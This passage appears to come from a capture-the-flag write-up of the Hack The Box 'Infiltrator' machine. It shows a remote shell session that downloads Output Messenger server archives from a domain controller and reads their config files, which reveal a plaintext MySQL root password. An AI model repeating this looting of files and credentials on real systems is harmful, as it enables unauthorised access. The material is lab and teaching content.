Output Messenger
During the initial system enumeration, it was identified that the dc01.infiltrator.htb host is running Output Messenger
Output Messenger is a secure, on-premise messaging solution designed for team communication within businesses. It offers features like instant messaging, voice and video calls, file sharing, and screen sharing to facilitate collaboration among team members. The platform supports private and group chats, ensuring that conversations remain within the organization. Additionally, Output Messenger integrates with various tools and provides robust encryption to protect sensitive information.
Config Files
*Evil-WinRM* PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 12/4/2023 9:22 AM Microsoft
d----- 12/10/2023 7:22 AM Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
d----- 2/20/2024 3:18 AM MySQL
d----- 2/19/2024 7:43 AM Output Messenger
d----- 2/19/2024 7:50 AM Output Messenger Server
d----- 2/19/2024 7:51 AM Package Cache
d----- 9/1/2024 10:19 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 11/5/2022 12:03 PM ssh
d----- 12/4/2023 9:23 AM USOPrivate
d----- 11/5/2022 12:03 PM USOShared
d----- 12/4/2023 9:23 AM VMwareThe C:\ProgramData directory containsOutput Messenger and Output Messenger Server directories
Output Messenger
*Evil-WinRM* PS C:\ProgramData> cd "Output Messenger"
*Evil-WinRM* PS C:\ProgramData\Output Messenger> ls
Directory: C:\ProgramData\Output Messenger
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2024 2:37 PM Profile
*Evil-WinRM* PS C:\ProgramData\Output Messenger> cd *
*Evil-WinRM* PS C:\ProgramData\Output Messenger\Profile> tree /F /A
Folder PATH listing
Volume serial number is 96C7-B603
C:.
| U20219021945
| U30219021701
| U40219021603
| U50219021752
| U60219021831
| U70219022015
| U80219021917
|
+---Chatroom
| \---Small
\---Small
U20219021945
U30219021701
U40219021603
U50219021752
U60219021831
U70219022015
U80219021917Those files appear to be encrypted
Output Messenger Server
*Evil-WinRM* PS C:\ProgramData\Output Messenger Server> ls
Directory: C:\ProgramData\Output Messenger Server
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2024 7:51 AM Temp
*Evil-WinRM* PS C:\ProgramData\Output Messenger Server> cd Temp ; ls
Directory: C:\ProgramData\Output Messenger Server\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/19/2024 7:51 AM 15702539 OutputMessengerApache.zip
-a---- 2/19/2024 7:51 AM 25477937 OutputMessengerMysql.zip
-a---- 2/19/2024 7:52 AM 3369187 OutputWall.zip
-a---- 2/19/2024 7:51 AM 6554576 vcredist_x86.exeThere are zip files. Those might contain valuable data
*Evil-WinRM* PS C:\ProgramData\Output Messenger Server\Temp> download OutputMessengerApache.zip .
Info: Downloading C:\ProgramData\Output Messenger Server\Temp\OutputMessengerApache.zip to OutputMessengerApache.zip
Info: Download successful!
*Evil-WinRM* PS C:\ProgramData\Output Messenger Server\Temp> download OutputMessengerMysql.zip .
Info: Downloading C:\ProgramData\Output Messenger Server\Temp\OutputMessengerMysql.zip to OutputMessengerMysql.zip
Info: Download successful!
*Evil-WinRM* PS C:\ProgramData\Output Messenger Server\Temp> download OutputWall.zip .
Info: Downloading C:\ProgramData\Output Messenger Server\Temp\OutputWall.zip to OutputWall.zip
Info: Download successful!Transfer complete
OutputMessengerApache.zip
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ unzip OutputMessengerApache.zip -d OutputMessengerApache
Archive: OutputMessengerApache.zipExtracting content
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ tree OutputMessengerApache
OutputMessengerApache
├── OutputApache.ini
├── apache2
│ ├── ABOUT_APACHE.txt
│ ├── CHANGES.txt
│ ├── INSTALL.txt
│ ├── LICENSE.txt
│ ├── NOTICE.txt
│ ├── OPENSSL-NEWS.txt
│ ├── OPENSSL-README.txt
│ ├── README.txt
│ ├── bin
│ │ ├── _libpq.dll
│ │ ├── apr_dbd_odbc-1.dll
│ │ ├── apr_ldap-1.dll
│ │ ├── dbmmanage.pl
│ │ ├── libapr-1.dll
│ │ ├── libapriconv-1.dll
│ │ ├── libaprutil-1.dll
│ │ ├── libeay32.dll
│ │ ├── libhttpd.dll
│ │ ├── libpq.dll
│ │ ├── libxml2.dll
│ │ ├── lua51.dll
│ │ ├── msvcr100.dll
│ │ ├── openssl.exe
│ │ ├── outputmessenger_httpd.exe
│ │ ├── pcre.dll
│ │ ├── php5ts.dll
│ │ ├── ssleay32.dll
│ │ └── zlib1.dll
│ ├── cgi-bin
│ │ └── printenv.pl
│ ├── conf
│ │ ├── charset.conv
│ │ ├── httpd.conf
│ │ ├── magic
│ │ ├── mime.types
│ │ └── openssl.cnf
│ ├── logs
│ │ └── nonempty
│ └── modules
│ ├── mod_access_compat.so
│ ├── mod_actions.so
│ ├── mod_alias.so
│ ├── mod_allowmethods.so
│ ├── mod_asis.so
│ ├── mod_auth_basic.so
│ ├── mod_auth_digest.so
│ ├── mod_auth_form.so
│ ├── mod_authn_anon.so
│ ├── mod_authn_core.so
│ ├── mod_authn_dbd.so
│ ├── mod_authn_dbm.so
│ ├── mod_authn_file.so
│ ├── mod_authn_socache.so
│ ├── mod_authnz_ldap.so
│ ├── mod_authz_core.so
│ ├── mod_authz_dbd.so
│ ├── mod_authz_dbm.so
│ ├── mod_authz_groupfile.so
│ ├── mod_authz_host.so
│ ├── mod_authz_owner.so
│ ├── mod_authz_user.so
│ ├── mod_autoindex.so
│ ├── mod_buffer.so
│ ├── mod_cache.so
│ ├── mod_cache_disk.so
│ ├── mod_cache_socache.so
│ ├── mod_cern_meta.so
│ ├── mod_cgi.so
│ ├── mod_charset_lite.so
│ ├── mod_data.so
│ ├── mod_dav.so
│ ├── mod_dav_fs.so
│ ├── mod_dav_lock.so
│ ├── mod_dbd.so
│ ├── mod_deflate.so
│ ├── mod_dir.so
│ ├── mod_dumpio.so
│ ├── mod_env.so
│ ├── mod_expires.so
│ ├── mod_ext_filter.so
│ ├── mod_file_cache.so
│ ├── mod_filter.so
│ ├── mod_headers.so
│ ├── mod_heartbeat.so
│ ├── mod_heartmonitor.so
│ ├── mod_ident.so
│ ├── mod_imagemap.so
│ ├── mod_include.so
│ ├── mod_info.so
│ ├── mod_isapi.so
│ ├── mod_lbmethod_bybusyness.so
│ ├── mod_lbmethod_byrequests.so
│ ├── mod_lbmethod_bytraffic.so
│ ├── mod_lbmethod_heartbeat.so
│ ├── mod_ldap.so
│ ├── mod_log_config.so
│ ├── mod_log_debug.so
│ ├── mod_log_forensic.so
│ ├── mod_logio.so
│ ├── mod_lua.so
│ ├── mod_macro.so
│ ├── mod_mime.so
│ ├── mod_mime_magic.so
│ ├── mod_negotiation.so
│ ├── mod_proxy.so
│ ├── mod_proxy_ajp.so
│ ├── mod_proxy_balancer.so
│ ├── mod_proxy_connect.so
│ ├── mod_proxy_express.so
│ ├── mod_proxy_fcgi.so
│ ├── mod_proxy_ftp.so
│ ├── mod_proxy_html.so
│ ├── mod_proxy_http.so
│ ├── mod_proxy_scgi.so
│ ├── mod_proxy_wstunnel.so
│ ├── mod_ratelimit.so
│ ├── mod_reflector.so
│ ├── mod_remoteip.so
│ ├── mod_reqtimeout.so
│ ├── mod_request.so
│ ├── mod_rewrite.so
│ ├── mod_sed.so
│ ├── mod_session.so
│ ├── mod_session_cookie.so
│ ├── mod_session_crypto.so
│ ├── mod_session_dbd.so
│ ├── mod_setenvif.so
│ ├── mod_slotmem_plain.so
│ ├── mod_slotmem_shm.so
│ ├── mod_socache_dbm.so
│ ├── mod_socache_memcache.so
│ ├── mod_socache_shmcb.so
│ ├── mod_speling.so
│ ├── mod_ssl.so
│ ├── mod_status.so
│ ├── mod_substitute.so
│ ├── mod_unique_id.so
│ ├── mod_userdir.so
│ ├── mod_usertrack.so
│ ├── mod_version.so
│ ├── mod_vhost_alias.so
│ ├── mod_watchdog.so
│ └── mod_xml2enc.so
├── log
├── php
│ ├── ext
│ │ ├── php_bz2.dll
│ │ ├── php_com_dotnet.dll
│ │ ├── php_curl.dll
│ │ ├── php_enchant.dll
│ │ ├── php_exif.dll
│ │ ├── php_fileinfo.dll
│ │ ├── php_gd2.dll
│ │ ├── php_gettext.dll
│ │ ├── php_gmp.dll
│ │ ├── php_imap.dll
│ │ ├── php_interbase.dll
│ │ ├── php_intl.dll
│ │ ├── php_ldap.dll
│ │ ├── php_mbstring.dll
│ │ ├── php_mysql.dll
│ │ ├── php_mysqli.dll
│ │ ├── php_oauth.dll
│ │ ├── php_oci8.dll
│ │ ├── php_oci8_11g.dll
│ │ ├── php_opcache.dll
│ │ ├── php_openssl.dll
│ │ ├── php_otime.dll
│ │ ├── php_pdo_firebird.dll
│ │ ├── php_pdo_mysql.dll
│ │ ├── php_pdo_oci.dll
│ │ ├── php_pdo_odbc.dll
│ │ ├── php_pdo_pgsql.dll
│ │ ├── php_pdo_sqlite.dll
│ │ ├── php_pgsql.dll
│ │ ├── php_shmop.dll
│ │ ├── php_snmp.dll
│ │ ├── php_soap.dll
│ │ ├── php_sockets.dll
│ │ ├── php_sqlite3.dll
│ │ ├── php_sybase_ct.dll
│ │ ├── php_tidy.dll
│ │ ├── php_xmlrpc.dll
│ │ └── php_xsl.dll
│ ├── glib-2.dll
│ ├── install.txt
│ ├── libeay32.dll
│ ├── libpq.dll
│ ├── license.txt
│ ├── news.txt
│ ├── outputmessenger_php.exe
│ ├── php.ini
│ ├── php5apache2_4.dll
│ ├── php5nsapi.dll
│ ├── php5ts.dll
│ ├── readme-redist-bins.txt
│ ├── snapshot.txt
│ └── ssleay32.dll
├── settings
│ ├── httpd.conf
│ ├── outputtime.ini
│ ├── php.ini
│ └── testPort.php
└── www
12 directories, 195 filesN/A
OutputMessengerMysql.zip
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ unzip OutputMessengerMysql.zip -d OutputMessengerMysql
Archive: OutputMessengerMysql.zipExtracting content
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ tree OutputMessengerMysql
OutputMessengerMysql
├── OutputMysql.ini
├── backup
├── data
│ ├── mysql
│ │ ├── column_stats.MYD
│ │ ├── column_stats.MYI
│ │ ├── column_stats.frm
│ │ ├── columns_priv.MYD
│ │ ├── columns_priv.MYI
│ │ ├── columns_priv.frm
│ │ ├── db.MYD
│ │ ├── db.MYI
│ │ ├── db.frm
│ │ ├── event.MYD
│ │ ├── event.MYI
│ │ ├── event.frm
│ │ ├── func.MYD
│ │ ├── func.MYI
│ │ ├── func.frm
│ │ ├── general_log.CSM
│ │ ├── general_log.CSV
│ │ ├── general_log.frm
│ │ ├── gtid_slave_pos.frm
│ │ ├── gtid_slave_pos.ibd
│ │ ├── help_category.MYD
│ │ ├── help_category.MYI
│ │ ├── help_category.frm
│ │ ├── help_keyword.MYD
│ │ ├── help_keyword.MYI
│ │ ├── help_keyword.frm
│ │ ├── help_relation.MYD
│ │ ├── help_relation.MYI
│ │ ├── help_relation.frm
│ │ ├── help_topic.MYD
│ │ ├── help_topic.MYI
│ │ ├── help_topic.frm
│ │ ├── host.MYD
│ │ ├── host.MYI
│ │ ├── host.frm
│ │ ├── index_stats.MYD
│ │ ├── index_stats.MYI
│ │ ├── index_stats.frm
│ │ ├── innodb_index_stats.frm
│ │ ├── innodb_index_stats.ibd
│ │ ├── innodb_table_stats.frm
│ │ ├── innodb_table_stats.ibd
│ │ ├── plugin.MYD
│ │ ├── plugin.MYI
│ │ ├── plugin.frm
│ │ ├── proc.MYD
│ │ ├── proc.MYI
│ │ ├── proc.frm
│ │ ├── procs_priv.MYD
│ │ ├── procs_priv.MYI
│ │ ├── procs_priv.frm
│ │ ├── proxies_priv.MYD
│ │ ├── proxies_priv.MYI
│ │ ├── proxies_priv.frm
│ │ ├── roles_mapping.MYD
│ │ ├── roles_mapping.MYI
│ │ ├── roles_mapping.frm
│ │ ├── servers.MYD
│ │ ├── servers.MYI
│ │ ├── servers.frm
│ │ ├── slow_log.CSM
│ │ ├── slow_log.CSV
│ │ ├── slow_log.frm
│ │ ├── table_stats.MYD
│ │ ├── table_stats.MYI
│ │ ├── table_stats.frm
│ │ ├── tables_priv.MYD
│ │ ├── tables_priv.MYI
│ │ ├── tables_priv.frm
│ │ ├── time_zone.MYD
│ │ ├── time_zone.MYI
│ │ ├── time_zone.frm
│ │ ├── time_zone_leap_second.MYD
│ │ ├── time_zone_leap_second.MYI
│ │ ├── time_zone_leap_second.frm
│ │ ├── time_zone_name.MYD
│ │ ├── time_zone_name.MYI
│ │ ├── time_zone_name.frm
│ │ ├── time_zone_transition.MYD
│ │ ├── time_zone_transition.MYI
│ │ ├── time_zone_transition.frm
│ │ ├── time_zone_transition_type.MYD
│ │ ├── time_zone_transition_type.MYI
│ │ ├── time_zone_transition_type.frm
│ │ ├── user.MYD
│ │ ├── user.MYI
│ │ └── user.frm
│ ├── outputwall
│ │ └── db.opt
│ ├── performance_schema
│ │ └── db.opt
│ └── test
├── mysql
│ ├── COPYING
│ ├── README
│ ├── bin
│ │ ├── innochecksum.exe
│ │ ├── myisam_ftdump.exe
│ │ ├── myisamchk.exe
│ │ ├── myisamlog.exe
│ │ ├── myisampack.exe
│ │ ├── mysql.exe
│ │ ├── mysql_config.pl
│ │ ├── mysql_embedded.exe
│ │ ├── mysql_install_db.exe
│ │ ├── mysql_tzinfo_to_sql.exe
│ │ ├── mysqladmin.exe
│ │ ├── mysqlbinlog.exe
│ │ ├── mysqlcheck.exe
│ │ ├── mysqldump.exe
│ │ ├── mysqlimport.exe
│ │ ├── mysqlshow.exe
│ │ ├── mysqlslap.exe
│ │ ├── outputmessenger_mysqld.exe
│ │ ├── perror.exe
│ │ └── replace.exe
│ ├── data
│ │ ├── Rajaguru.err
│ │ ├── Rajaguru.pid
│ │ ├── aria_log.00000001
│ │ ├── aria_log_control
│ │ ├── ib_logfile0
│ │ ├── ib_logfile1
│ │ ├── ibdata1
│ │ ├── multi-master.info
│ │ ├── my.ini
│ │ ├── mysql
│ │ │ ├── column_stats.MYD
│ │ │ ├── column_stats.MYI
│ │ │ ├── column_stats.frm
│ │ │ ├── columns_priv.MYD
│ │ │ ├── columns_priv.MYI
│ │ │ ├── columns_priv.frm
│ │ │ ├── db.MYD
│ │ │ ├── db.MYI
│ │ │ ├── db.frm
│ │ │ ├── event.MYD
│ │ │ ├── event.MYI
│ │ │ ├── event.frm
│ │ │ ├── func.MYD
│ │ │ ├── func.MYI
│ │ │ ├── func.frm
│ │ │ ├── general_log.CSM
│ │ │ ├── general_log.CSV
│ │ │ ├── general_log.frm
│ │ │ ├── gtid_slave_pos.frm
│ │ │ ├── gtid_slave_pos.ibd
│ │ │ ├── help_category.MYD
│ │ │ ├── help_category.MYI
│ │ │ ├── help_category.frm
│ │ │ ├── help_keyword.MYD
│ │ │ ├── help_keyword.MYI
│ │ │ ├── help_keyword.frm
│ │ │ ├── help_relation.MYD
│ │ │ ├── help_relation.MYI
│ │ │ ├── help_relation.frm
│ │ │ ├── help_topic.MYD
│ │ │ ├── help_topic.MYI
│ │ │ ├── help_topic.frm
│ │ │ ├── host.MYD
│ │ │ ├── host.MYI
│ │ │ ├── host.frm
│ │ │ ├── index_stats.MYD
│ │ │ ├── index_stats.MYI
│ │ │ ├── index_stats.frm
│ │ │ ├── innodb_index_stats.frm
│ │ │ ├── innodb_index_stats.ibd
│ │ │ ├── innodb_table_stats.frm
│ │ │ ├── innodb_table_stats.ibd
│ │ │ ├── plugin.MYD
│ │ │ ├── plugin.MYI
│ │ │ ├── plugin.frm
│ │ │ ├── proc.MYD
│ │ │ ├── proc.MYI
│ │ │ ├── proc.frm
│ │ │ ├── procs_priv.MYD
│ │ │ ├── procs_priv.MYI
│ │ │ ├── procs_priv.frm
│ │ │ ├── proxies_priv.MYD
│ │ │ ├── proxies_priv.MYI
│ │ │ ├── proxies_priv.frm
│ │ │ ├── roles_mapping.MYD
│ │ │ ├── roles_mapping.MYI
│ │ │ ├── roles_mapping.frm
│ │ │ ├── servers.MYD
│ │ │ ├── servers.MYI
│ │ │ ├── servers.frm
│ │ │ ├── slow_log.CSM
│ │ │ ├── slow_log.CSV
│ │ │ ├── slow_log.frm
│ │ │ ├── table_stats.MYD
│ │ │ ├── table_stats.MYI
│ │ │ ├── table_stats.frm
│ │ │ ├── tables_priv.MYD
│ │ │ ├── tables_priv.MYI
│ │ │ ├── tables_priv.frm
│ │ │ ├── time_zone.MYD
│ │ │ ├── time_zone.MYI
│ │ │ ├── time_zone.frm
│ │ │ ├── time_zone_leap_second.MYD
│ │ │ ├── time_zone_leap_second.MYI
│ │ │ ├── time_zone_leap_second.frm
│ │ │ ├── time_zone_name.MYD
│ │ │ ├── time_zone_name.MYI
│ │ │ ├── time_zone_name.frm
│ │ │ ├── time_zone_transition.MYD
│ │ │ ├── time_zone_transition.MYI
│ │ │ ├── time_zone_transition.frm
│ │ │ ├── time_zone_transition_type.MYD
│ │ │ ├── time_zone_transition_type.MYI
│ │ │ ├── time_zone_transition_type.frm
│ │ │ ├── user.MYD
│ │ │ ├── user.MYI
│ │ │ └── user.frm
│ │ ├── outputwall
│ │ │ └── db.opt
│ │ ├── performance_schema
│ │ │ └── db.opt
│ │ └── test
│ ├── my.ini
│ └── share
│ ├── charsets
│ │ ├── Index.xml
│ │ ├── README
│ │ ├── armscii8.xml
│ │ ├── ascii.xml
│ │ ├── cp1250.xml
│ │ ├── cp1251.xml
│ │ ├── cp1256.xml
│ │ ├── cp1257.xml
│ │ ├── cp850.xml
│ │ ├── cp852.xml
│ │ ├── cp866.xml
│ │ ├── dec8.xml
│ │ ├── geostd8.xml
│ │ ├── greek.xml
│ │ ├── hebrew.xml
│ │ ├── hp8.xml
│ │ ├── keybcs2.xml
│ │ ├── koi8r.xml
│ │ ├── koi8u.xml
│ │ ├── latin1.xml
│ │ ├── latin2.xml
│ │ ├── latin5.xml
│ │ ├── latin7.xml
│ │ ├── macce.xml
│ │ ├── macroman.xml
│ │ └── swe7.xml
│ ├── czech
│ │ └── errmsg.sys
│ ├── danish
│ │ └── errmsg.sys
│ ├── dutch
│ │ └── errmsg.sys
│ ├── english
│ │ └── errmsg.sys
│ ├── errmsg-utf8.txt
│ ├── estonian
│ │ └── errmsg.sys
│ ├── fill_help_tables.sql
│ ├── french
│ │ └── errmsg.sys
│ ├── german
│ │ └── errmsg.sys
│ ├── greek
│ │ └── errmsg.sys
│ ├── hungarian
│ │ └── errmsg.sys
│ ├── install_spider.sql
│ ├── italian
│ │ └── errmsg.sys
│ ├── japanese
│ │ └── errmsg.sys
│ ├── korean
│ │ └── errmsg.sys
│ ├── maria_add_gis_sp.sql
│ ├── maria_add_gis_sp_bootstrap.sql
│ ├── mysql_performance_tables.sql
│ ├── mysql_system_tables.sql
│ ├── mysql_system_tables_data.sql
│ ├── mysql_test_data_timezone.sql
│ ├── mysql_to_mariadb.sql
│ ├── norwegian
│ │ └── errmsg.sys
│ ├── norwegian-ny
│ │ └── errmsg.sys
│ ├── polish
│ │ └── errmsg.sys
│ ├── portuguese
│ │ └── errmsg.sys
│ ├── romanian
│ │ └── errmsg.sys
│ ├── russian
│ │ └── errmsg.sys
│ ├── serbian
│ │ └── errmsg.sys
│ ├── slovak
│ │ └── errmsg.sys
│ ├── spanish
│ │ └── errmsg.sys
│ ├── swedish
│ │ └── errmsg.sys
│ └── ukrainian
│ └── errmsg.sys
└── settings
└── my.ini
40 directories, 271 filesOutputMysql.ini
settings/my.ini
OutputMysql.ini
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ cat OutputMessengerMysql/OutputMysql.ini
[SETTINGS]
SQLPort=14406
Version=1.0.0
[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall
[PATHCONFIG]
;mysql5.6.17
MySQL=mysql
Log=log
def_conf=settings
MySQL_data=data
Backup=backuproot:ibWijteig5
settings/my.ini
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ cat OutputMessengerMysql/settings/my.ini | grep -i passw
password=ibWijteig5ibWijteig5
OutputWall.zip
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ unzip OutputWall.zip -d OutputWall
Archive: OutputWall.zipExtracting content
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/Output_Messenger]
└─$ tree OutputWall
OutputWall
└── output
├── application
│ ├── config
│ │ ├── autoload.php
│ │ ├── client.db.php
│ │ ├── client.php
│ │ ├── config.php
│ │ ├── constants.php
│ │ ├── database.php
│ │ ├── doctypes.php
│ │ ├── email.php
│ │ ├── foreign_chars.php
│ │ ├── hooks.php
│ │ ├── index.php
│ │ ├── memcached.php
│ │ ├── migration.php
│ │ ├── mimes.php
│ │ ├── profiler.php
│ │ ├── rest.php
│ │ ├── routes.php
│ │ ├── smileys.php
│ │ ├── smx_config.php
│ │ └── user_agents.php
│ ├── controllers
│ │ ├── Api.php
│ │ ├── Home.php
│ │ ├── Wall_database.php
│ │ └── v1
│ │ ├── Auth_v1.php
│ │ ├── Wall_auth_v1.php
│ │ ├── Wall_v1.php
│ │ └── index.php
│ ├── core
│ │ ├── OT_Controller.php
│ │ ├── OT_Input.php
│ │ ├── OT_Lang.php
│ │ ├── OT_Loader.php
│ │ ├── OT_Security.php
│ │ └── index.php
│ ├── helpers
│ │ ├── addons_helper.php
│ │ ├── aws_helper.php
│ │ ├── common_helper.php
│ │ ├── index.php
│ │ └── smx_language_helper.php
│ ├── language
│ │ ├── english
│ │ │ ├── common_lang.php
│ │ │ ├── index.php
│ │ │ └── user_lang.php
│ │ └── index.php
│ ├── libraries
│ │ ├── Auth.php
│ │ ├── Entity_users_table.php
│ │ ├── Format.php
│ │ ├── REST_Controller.php
│ │ ├── Wall_table.php
│ │ ├── base
│ │ │ ├── OT_App.php
│ │ │ ├── OT_User.php
│ │ │ ├── OT_User_api.php
│ │ │ ├── OT_User_browser.php
│ │ │ ├── Request.php
│ │ │ ├── Response.php
│ │ │ ├── Response_ajax.php
│ │ │ ├── Response_html.php
│ │ │ └── index.php
│ │ └── base_table.php
│ ├── logs
│ ├── models
│ │ ├── mod.attachment.php
│ │ ├── mod.entity.php
│ │ ├── mod.user.php
│ │ ├── mod.wall.php
│ │ └── wall
│ │ ├── mod.wall_manager.php
│ │ └── mod.wall_master.php
│ └── views
│ └── errors
│ ├── cli
│ │ ├── error_404.php
│ │ ├── error_db.php
│ │ ├── error_exception.php
│ │ ├── error_general.php
│ │ ├── error_php.php
│ │ └── index.html
│ ├── html
│ │ ├── error_404.php
│ │ ├── error_db.php
│ │ ├── error_exception.php
│ │ ├── error_general.php
│ │ ├── error_php.php
│ │ └── index.html
│ └── index.html
├── conf.ini
├── db.sql
├── favicon.ico
├── favicon.png
├── index.php
├── license.txt
├── system
│ ├── core
│ │ ├── Benchmark.php
│ │ ├── CodeIgniter.php
│ │ ├── Common.php
│ │ ├── Config.php
│ │ ├── Controller.php
│ │ ├── Exceptions.php
│ │ ├── Hooks.php
│ │ ├── Input.php
│ │ ├── Lang.php
│ │ ├── Loader.php
│ │ ├── Log.php
│ │ ├── Model.php
│ │ ├── Output.php
│ │ ├── Router.php
│ │ ├── Security.php
│ │ ├── URI.php
│ │ ├── Utf8.php
│ │ ├── compat
│ │ │ ├── hash.php
│ │ │ ├── index.html
│ │ │ ├── mbstring.php
│ │ │ ├── password.php
│ │ │ └── standard.php
│ │ └── index.html
│ ├── database
│ │ ├── DB.php
│ │ ├── DB_cache.php
│ │ ├── DB_driver.php
│ │ ├── DB_forge.php
│ │ ├── DB_query_builder.php
│ │ ├── DB_result.php
│ │ ├── DB_utility.php
│ │ ├── drivers
│ │ │ ├── cubrid
│ │ │ │ ├── cubrid_driver.php
│ │ │ │ ├── cubrid_forge.php
│ │ │ │ ├── cubrid_result.php
│ │ │ │ ├── cubrid_utility.php
│ │ │ │ └── index.html
│ │ │ ├── ibase
│ │ │ │ ├── ibase_driver.php
│ │ │ │ ├── ibase_forge.php
│ │ │ │ ├── ibase_result.php
│ │ │ │ ├── ibase_utility.php
│ │ │ │ └── index.html
│ │ │ ├── index.html
│ │ │ ├── mssql
│ │ │ │ ├── index.html
│ │ │ │ ├── mssql_driver.php
│ │ │ │ ├── mssql_forge.php
│ │ │ │ ├── mssql_result.php
│ │ │ │ └── mssql_utility.php
│ │ │ ├── mysql
│ │ │ │ ├── index.html
│ │ │ │ ├── mysql_driver.php
│ │ │ │ ├── mysql_forge.php
│ │ │ │ ├── mysql_result.php
│ │ │ │ └── mysql_utility.php
│ │ │ ├── mysqli
│ │ │ │ ├── index.html
│ │ │ │ ├── mysqli_driver.php
│ │ │ │ ├── mysqli_forge.php
│ │ │ │ ├── mysqli_result.php
│ │ │ │ └── mysqli_utility.php
│ │ │ ├── oci8
│ │ │ │ ├── index.html
│ │ │ │ ├── oci8_driver.php
│ │ │ │ ├── oci8_forge.php
│ │ │ │ ├── oci8_result.php
│ │ │ │ └── oci8_utility.php
│ │ │ ├── odbc
│ │ │ │ ├── index.html
│ │ │ │ ├── odbc_driver.php
│ │ │ │ ├── odbc_forge.php
│ │ │ │ ├── odbc_result.php
│ │ │ │ └── odbc_utility.php
│ │ │ ├── pdo
│ │ │ │ ├── index.html
│ │ │ │ ├── pdo_driver.php
│ │ │ │ ├── pdo_forge.php
│ │ │ │ ├── pdo_result.php
│ │ │ │ ├── pdo_utility.php
│ │ │ │ └── subdrivers
│ │ │ │ ├── index.html
│ │ │ │ ├── pdo_4d_driver.php
│ │ │ │ ├── pdo_4d_forge.php
│ │ │ │ ├── pdo_cubrid_driver.php
│ │ │ │ ├── pdo_cubrid_forge.php
│ │ │ │ ├── pdo_dblib_driver.php
│ │ │ │ ├── pdo_dblib_forge.php
│ │ │ │ ├── pdo_firebird_driver.php
│ │ │ │ ├── pdo_firebird_forge.php
│ │ │ │ ├── pdo_ibm_driver.php
│ │ │ │ ├── pdo_ibm_forge.php
│ │ │ │ ├── pdo_informix_driver.php
│ │ │ │ ├── pdo_informix_forge.php
│ │ │ │ ├── pdo_mysql_driver.php
│ │ │ │ ├── pdo_mysql_forge.php
│ │ │ │ ├── pdo_oci_driver.php
│ │ │ │ ├── pdo_oci_forge.php
│ │ │ │ ├── pdo_odbc_driver.php
│ │ │ │ ├── pdo_odbc_forge.php
│ │ │ │ ├── pdo_pgsql_driver.php
│ │ │ │ ├── pdo_pgsql_forge.php
│ │ │ │ ├── pdo_sqlite_driver.php
│ │ │ │ ├── pdo_sqlite_forge.php
│ │ │ │ ├── pdo_sqlsrv_driver.php
│ │ │ │ └── pdo_sqlsrv_forge.php
│ │ │ ├── postgre
│ │ │ │ ├── index.html
│ │ │ │ ├── postgre_driver.php
│ │ │ │ ├── postgre_forge.php
│ │ │ │ ├── postgre_result.php
│ │ │ │ └── postgre_utility.php
│ │ │ ├── sqlite
│ │ │ │ ├── index.html
│ │ │ │ ├── sqlite_driver.php
│ │ │ │ ├── sqlite_forge.php
│ │ │ │ ├── sqlite_result.php
│ │ │ │ └── sqlite_utility.php
│ │ │ ├── sqlite3
│ │ │ │ ├── index.html
│ │ │ │ ├── sqlite3_driver.php
│ │ │ │ ├── sqlite3_forge.php
│ │ │ │ ├── sqlite3_result.php
│ │ │ │ └── sqlite3_utility.php
│ │ │ └── sqlsrv
│ │ │ ├── index.html
│ │ │ ├── sqlsrv_driver.php
│ │ │ ├── sqlsrv_forge.php
│ │ │ ├── sqlsrv_result.php
│ │ │ └── sqlsrv_utility.php
│ │ └── index.html
│ ├── fonts
│ │ ├── index.html
│ │ └── texb.ttf
│ ├── helpers
│ │ ├── array_helper.php
│ │ ├── captcha_helper.php
│ │ ├── cookie_helper.php
│ │ ├── date_helper.php
│ │ ├── directory_helper.php
│ │ ├── download_helper.php
│ │ ├── email_helper.php
│ │ ├── file_helper.php
│ │ ├── form_helper.php
│ │ ├── html_helper.php
│ │ ├── index.html
│ │ ├── inflector_helper.php
│ │ ├── language_helper.php
│ │ ├── number_helper.php
│ │ ├── path_helper.php
│ │ ├── security_helper.php
│ │ ├── smiley_helper.php
│ │ ├── string_helper.php
│ │ ├── text_helper.php
│ │ ├── typography_helper.php
│ │ ├── url_helper.php
│ │ └── xml_helper.php
│ ├── index.html
│ ├── language
│ │ ├── english
│ │ │ ├── calendar_lang.php
│ │ │ ├── date_lang.php
│ │ │ ├── db_lang.php
│ │ │ ├── email_lang.php
│ │ │ ├── form_validation_lang.php
│ │ │ ├── ftp_lang.php
│ │ │ ├── imglib_lang.php
│ │ │ ├── index.html
│ │ │ ├── migration_lang.php
│ │ │ ├── number_lang.php
│ │ │ ├── pagination_lang.php
│ │ │ ├── profiler_lang.php
│ │ │ ├── unit_test_lang.php
│ │ │ └── upload_lang.php
│ │ └── index.html
│ └── libraries
│ ├── Cache
│ │ ├── Cache.php
│ │ ├── drivers
│ │ │ ├── Cache_apc.php
│ │ │ ├── Cache_dummy.php
│ │ │ ├── Cache_file.php
│ │ │ ├── Cache_memcached.php
│ │ │ ├── Cache_redis.php
│ │ │ ├── Cache_wincache.php
│ │ │ └── index.html
│ │ └── index.html
│ ├── Calendar.php
│ ├── Cart.php
│ ├── Driver.php
│ ├── Email.php
│ ├── Encrypt.php
│ ├── Encryption.php
│ ├── Form_validation.php
│ ├── Ftp.php
│ ├── Image_lib.php
│ ├── Javascript
│ │ ├── Jquery.php
│ │ └── index.html
│ ├── Javascript.php
│ ├── Migration.php
│ ├── Pagination.php
│ ├── Parser.php
│ ├── Profiler.php
│ ├── Session
│ │ ├── Session.php
│ │ ├── SessionHandlerInterface.php
│ │ ├── Session_driver.php
│ │ ├── drivers
│ │ │ ├── Session_database_driver.php
